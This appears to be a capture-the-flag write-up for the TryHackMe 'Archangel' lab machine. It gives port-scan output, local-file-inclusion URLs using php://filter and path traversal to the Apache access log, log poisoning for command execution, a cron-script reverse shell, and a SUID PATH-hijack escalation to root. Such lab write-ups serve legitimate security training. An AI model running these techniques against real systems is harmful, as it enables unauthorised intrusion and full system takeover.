# TryHackMe-Archangel
## Rustscan
```
rustscan -a 10.10.53.100 -- -A -sC -sV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.53.100:22
Open 10.10.53.100:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 9f:1d:2c:9d:6c:a4:0e:46:40:50:6f:ed:cf:1c:f3:8c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDPrwb4vLZ/CJqefgxZMUh3zsubjXMLrKYpP8Oy5jNSRaZynNICWMQNfcuLZ2GZbR84iEQJrNqCFcbsgD+4OPyy0TXV1biJExck3OlriDBn3g
9trxh6qcHTBKoUMM3CnEJtuaZ1ZPmmebbRGyrG03jzIow+w2updsJ3C0nkUxdSQ7FaNxwYOZ5S3X5XdLw2RXu/o130fs6qmFYYTm2qii6Ilf5EkyffeYRc8SbPpZKoEpT7TQ08VYEICier9ND408
kGERHinsVtBDkaCec3XmWXkFsOJUdW4BYVhrD3M8JBvL1kPmReOnx8Q7JX2JpGDenXNOjEBS3BIX2vjj17Qo3V
| 256 63:73:27:c7:61:04:25:6a:08:70:7a:36:b2:f2:84:0d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKhhd/akQ2OLPa2ogtMy7V/GEqDyDz8IZZQ+266QEHke6vdC9papydu1wlbdtMVdOPx1S6zxA4
CzyrcIwDQSiCg=
| 256 b6:4e:d2:9c:37:85:d6:76:53:e8:c4:e0:48:1c:ae:6c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBE3FV9PrmRlGbT2XSUjGvDjlWoA/7nPoHjcCXLer12O
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Wavefire
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
```
## PORT 80 (HTTP)
Looking at the source code we can find a domain name
So lets put this is in our `/etc/hosts` file
Now we need to fuzz for a page that is "under development" for that I am going to use gobuster
And we found a `test.php` file
On clicking the button we can see on the url there's a GET parameter being used so we can check for LFI (Local File Inclusion) vulnerability. I tired a bunch of LFI techniques like `../../../../etc/passwd` but it failed.
I used this technqiue what it does is that encodes the whole page into base64.
`http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/mrrobot.php`
We can do this for `test.php` as well
`http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php`
We can fuzz for /etc/passwd to do that we can use `wfuzz`
```
http://mafialive.thm/test.php?view=/var/www/html/development_testing/test.php
```
This doesn't help as we are getting the length of the response 286 and 310 which is not /etc/passwd so we can hide that response
For getting a reverse shell we need to poison the apach2 log file but before that we need to make sure that log is being accessbile.
We can access the log by the method above
```
http://mafialive.thm/test.php?view=/var/www/html/development_testing./.././.././.././..///var/log/apache2/access.log
```
Now intercept the request through burp suite and add php GET parameter code in `User-Agent`
Let's try to access the page with `&c=id` at the end
```
http://mafialive.thm/test.php?view=/var/www/html/development_testing./.././.././.././..///var/log/apache2/access.log&c=id
```
We can at the bottom of the page that id command was executed so we can now get a reverse shell
Host a file having a reverse shell payload in it
On running the command
Now we need to give it permission to execute
Execute it
Checking cronjobs we see
We can see that this file can be written by anyone so we can write bash reverse shell to get a shell as user `archangel`
And we got the shell
We can see `backup` binary having a SUID also it belongs to root user and group , on using strings on it
We can see that it's using cp (copy command) so here PATH exploitation comes where we can create a binary with the same name having `bash` in it and then set PATH where that "fake" binary is stored
Now run that binary
For simplicity I made /bin/bash a SUID to run as root
